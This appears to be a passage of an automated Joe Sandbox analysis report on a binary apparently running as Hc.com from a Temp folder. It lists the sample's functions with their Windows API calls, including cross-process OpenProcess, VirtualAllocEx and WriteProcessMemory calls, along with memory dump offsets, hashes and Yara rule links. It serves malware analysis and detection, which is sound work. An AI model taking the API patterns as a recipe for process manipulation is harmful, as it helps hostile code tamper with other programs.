                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                                                        • Opcode ID: dfd716f3bd7cb4e74d77823968fa2f4dc1c8c47b0ff632804c812a335f1e2814
                                                                                                                                                                        • Instruction ID: 49630203fbf4700cc28319c0ac7ba1ff901e71036cf57fa94d9452b34db5a31c
                                                                                                                                                                        • Opcode Fuzzy Hash: dfd716f3bd7cb4e74d77823968fa2f4dc1c8c47b0ff632804c812a335f1e2814
                                                                                                                                                                        • Instruction Fuzzy Hash: 240181B5641206BFDB114F64EC4DE6B3B6EEF853B4B210468F945C3260DA31DC50DA60
                                                                                                                                                                        Function 002C1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002C1916
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002C1922
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002C1931
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002C1938
                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002C194E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                        • Opcode ID: 6096dab16d913b15d37e78be88d6f66f07825b672174787cf66f733e5fda7fa6
                                                                                                                                                                        • Instruction ID: 04fbc1087a6484d38b34670c155623a32922750a4ee8ac798be1f791ca8a5a1c
                                                                                                                                                                        • Opcode Fuzzy Hash: 6096dab16d913b15d37e78be88d6f66f07825b672174787cf66f733e5fda7fa6
                                                                                                                                                                        • Instruction Fuzzy Hash: 12F06275100316ABDB210F65EC4EF673B6EEF897A0F100528FA45D7251CA70DC21CA60
                                                                                                                                                                        Function 002C1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002C1976
                                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002C1982
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C1991
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002C1998
                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C19AE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                        • Opcode ID: 8b25a5cc064c2bac8d2aaeab6cbe0105a6c41e05818f9ccb0acf1ea7f5353d47
                                                                                                                                                                        • Instruction ID: 58f5cb6f0078eec5301c0ee04e1373976ff85e4399f251eac054754be349c87d
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b25a5cc064c2bac8d2aaeab6cbe0105a6c41e05818f9ccb0acf1ea7f5353d47
                                                                                                                                                                        • Instruction Fuzzy Hash: BBF06275100315ABD7214F64EC5DF673B6EEF897A0F100528FA45C7251CA70D821CA60
                                                                                                                                                                        Function 002D0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CCB
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CD8
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CE5
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CF2
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CFF
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0D0C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                        • Opcode ID: 8e3a06efcd7cd3846b0f860ba155283b12fb508cdb28644263892dce0b42472f
                                                                                                                                                                        • Instruction ID: e90340c4984c4b5d60f94c1c730ef72e56ad504322fb3ff88b33233ffab80b3e
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e3a06efcd7cd3846b0f860ba155283b12fb508cdb28644263892dce0b42472f
                                                                                                                                                                        • Instruction Fuzzy Hash: A201DC71810B068FCB30AFA6D8C0916FAF9BF502157108A3FD19252A31C7B0A868DF80
                                                                                                                                                                        Function 002C65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 002C65BF
                                                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 002C65D6
                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 002C65EE
                                                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 002C660A
                                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 002C6624
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                                                        • Opcode ID: 4e996aab22e30d5d43dfd630d76c93bdebb4fb79b4c0bbab9cebadecfcacff95
                                                                                                                                                                        • Instruction ID: 8f70db47320b255e6dfb103703d832b9181b8e897cb83ee0a5ff552d9c5c1954
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e996aab22e30d5d43dfd630d76c93bdebb4fb79b4c0bbab9cebadecfcacff95
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B018630910304ABEB305F10ED4EFA67B7DFB00B55F00066DA187A10E1DBF4AA54CA51
                                                                                                                                                                        Function 0029DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _free.LIBCMT ref: 0029DAD2
                                                                                                                                                                          • Part of subcall function 00292D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4), ref: 00292D4E
                                                                                                                                                                          • Part of subcall function 00292D38: GetLastError.KERNEL32(00331DC4,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4,00331DC4), ref: 00292D60
                                                                                                                                                                        • _free.LIBCMT ref: 0029DAE4
                                                                                                                                                                        • _free.LIBCMT ref: 0029DAF6
                                                                                                                                                                        • _free.LIBCMT ref: 0029DB08
                                                                                                                                                                        • _free.LIBCMT ref: 0029DB1A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                        • Opcode ID: 3f19f1e8205ed159eb7f218d5fc225fdbf190520d74c8053da280d4709eacd94
                                                                                                                                                                        • Instruction ID: 2683b98f971cfc9ae5c4e4eba5e4c3d41f9af1f3624acfcae10b26fb12bf1def
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f19f1e8205ed159eb7f218d5fc225fdbf190520d74c8053da280d4709eacd94
                                                                                                                                                                        • Instruction Fuzzy Hash: 22F01D32564205BB8E65EF68EA86D1A77EDFE04714BA50C09F049D7501CB30FCA09AA4
                                                                                                                                                                        Function 00292610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _free.LIBCMT ref: 0029262E
                                                                                                                                                                          • Part of subcall function 00292D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4), ref: 00292D4E
                                                                                                                                                                          • Part of subcall function 00292D38: GetLastError.KERNEL32(00331DC4,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4,00331DC4), ref: 00292D60
                                                                                                                                                                        • _free.LIBCMT ref: 00292640
                                                                                                                                                                        • _free.LIBCMT ref: 00292653
                                                                                                                                                                        • _free.LIBCMT ref: 00292664
                                                                                                                                                                        • _free.LIBCMT ref: 00292675
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                        • Opcode ID: 3ab290b81eac0c01b9b1f8f67af71e6fec766dc5376ae0863e73c72a86977815
                                                                                                                                                                        • Instruction ID: 1d9976f3636621b8bf8b1df99d6f91efcf2a89bf3ddbd8b5a3ec7a4bf56f3d59
                                                                                                                                                                        • Opcode Fuzzy Hash: 3ab290b81eac0c01b9b1f8f67af71e6fec766dc5376ae0863e73c72a86977815
                                                                                                                                                                        • Instruction Fuzzy Hash: 1AF0FE70821521EB8F63AF54FD8184A3B6CFB28755F550A0AF414D6275C7310A26AFE5
                                                                                                                                                                        Function 002912B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __freea$_free
                                                                                                                                                                        • String ID: a/p$am/pm
                                                                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                                                                        • Opcode ID: 0cfba42ac509000922c6087f8d420d8429b64bffc768f8ae09a841a9dab54e32
                                                                                                                                                                        • Instruction ID: 4304552ba74555125fbb24c4246d3ccc68e52897f0061a37c376df924f17dcd3
                                                                                                                                                                        • Opcode Fuzzy Hash: 0cfba42ac509000922c6087f8d420d8429b64bffc768f8ae09a841a9dab54e32
                                                                                                                                                                        • Instruction Fuzzy Hash: CBD12375D302078ADF249FAAC8457FAB7B5FF05300F29415AE506AB290D3718DB0CBA0
                                                                                                                                                                        Function 002E5231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002D41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002E52EE,?,?,00000035,?), ref: 002D4229
                                                                                                                                                                          • Part of subcall function 002D41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002E52EE,?,?,00000035,?), ref: 002D4239
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 002E5419
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 002E550E
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002E55CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                        • String ID: bn,
                                                                                                                                                                        • API String ID: 2854431205-2109009046
                                                                                                                                                                        • Opcode ID: 58b2959343999caf2c44881da0c505cf30e1344c2badc218e96db57d6e53e204
                                                                                                                                                                        • Instruction ID: 7a7c5b476fb4b203cd57546a1140c758c018d9041b24916b5c210b553f23e5ef
                                                                                                                                                                        • Opcode Fuzzy Hash: 58b2959343999caf2c44881da0c505cf30e1344c2badc218e96db57d6e53e204
                                                                                                                                                                        • Instruction Fuzzy Hash: 30D15C74920249DFCB04DF95C491EEDBBB8FF48308F54815DE416AB292DB31A996CF50
                                                                                                                                                                        Function 0026CF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0026D253
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: t53$t53$t53
                                                                                                                                                                        • API String ID: 1385522511-176075375
                                                                                                                                                                        • Opcode ID: eca08f64dc67496b0a5cb70def6867bc4bf0d3925c6e277bcfe6a6ce7f7e8334
                                                                                                                                                                        • Instruction ID: 3baff84ee8173dfce6f308030455919704a58699bbb42069a94b22bfaf5e1ac6
                                                                                                                                                                        • Opcode Fuzzy Hash: eca08f64dc67496b0a5cb70def6867bc4bf0d3925c6e277bcfe6a6ce7f7e8334
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E913AB5E2020ACFCB14CF59C4906A9B7F1FF59310F24815AE995AB341D771EAA2CF90
                                                                                                                                                                        Function 002E61A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                                                                                                        • String ID: CALLARGARRAY$bn,
                                                                                                                                                                        • API String ID: 157775604-352716312
                                                                                                                                                                        • Opcode ID: c0e7827e22b7dd95d0a334bd4148caa9225461f6b7b4763cc11fbd5a26cb6b00
                                                                                                                                                                        • Instruction ID: c7c1b24ad0af30700d2c9e7d9e480b7d9b6bdc959799df880198fd99a4e29382
                                                                                                                                                                        • Opcode Fuzzy Hash: c0e7827e22b7dd95d0a334bd4148caa9225461f6b7b4763cc11fbd5a26cb6b00
                                                                                                                                                                        • Instruction Fuzzy Hash: 1641D471E20205DFCB00EFA5C8899BEBBB5FF693A0F50412AE906A7251D7719DA1CF50
                                                                                                                                                                        Function 002C3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002CBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C2B1D,?,?,00000034,00000800,?,00000034), ref: 002CBDF4
                                                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002C30AD
                                                                                                                                                                          • Part of subcall function 002CBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 002CBDBF
                                                                                                                                                                          • Part of subcall function 002CBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 002CBD1C
                                                                                                                                                                          • Part of subcall function 002CBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002C2AE1,00000034,?,?,00001004,00000000,00000000), ref: 002CBD2C
                                                                                                                                                                          • Part of subcall function 002CBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002C2AE1,00000034,?,?,00001004,00000000,00000000), ref: 002CBD42
                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002C311A
                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002C3167
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                                                        • Opcode ID: a465622d54087f01252ace799cbcfd2a7993917d2cc0689f42f742d25752d7b5
                                                                                                                                                                        • Instruction ID: af14b9db9aa56c23fa886bc5e65782fb04e5cf157b5506c48272b1b422f26bb2
                                                                                                                                                                        • Opcode Fuzzy Hash: a465622d54087f01252ace799cbcfd2a7993917d2cc0689f42f742d25752d7b5
                                                                                                                                                                        • Instruction Fuzzy Hash: E0412B72910218AEDB11DFA4CD46FEEB7B8EF49300F008599EA45B7180DA716F95CF60
                                                                                                                                                                        Function 00291A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\280366\Hc.com,00000104), ref: 00291AD9
                                                                                                                                                                        • _free.LIBCMT ref: 00291BA4
                                                                                                                                                                        • _free.LIBCMT ref: 00291BAE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                        • API String ID: 2506810119-1471809573
                                                                                                                                                                        • Opcode ID: f8cc9f2691e4e5591ab3d43555e0fdfc11488b2fdb82f0dc47546dc7d9ffef51
                                                                                                                                                                        • Instruction ID: 69fd8337405798218d32a3ff6154f5347c397ab4172e2f722d5362f0a349033a
                                                                                                                                                                        • Opcode Fuzzy Hash: f8cc9f2691e4e5591ab3d43555e0fdfc11488b2fdb82f0dc47546dc7d9ffef51
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F317E71A1021AABDF21DF9ADC85D9FBBFDEB85714F1041A6E80497261E6B04E60CB90
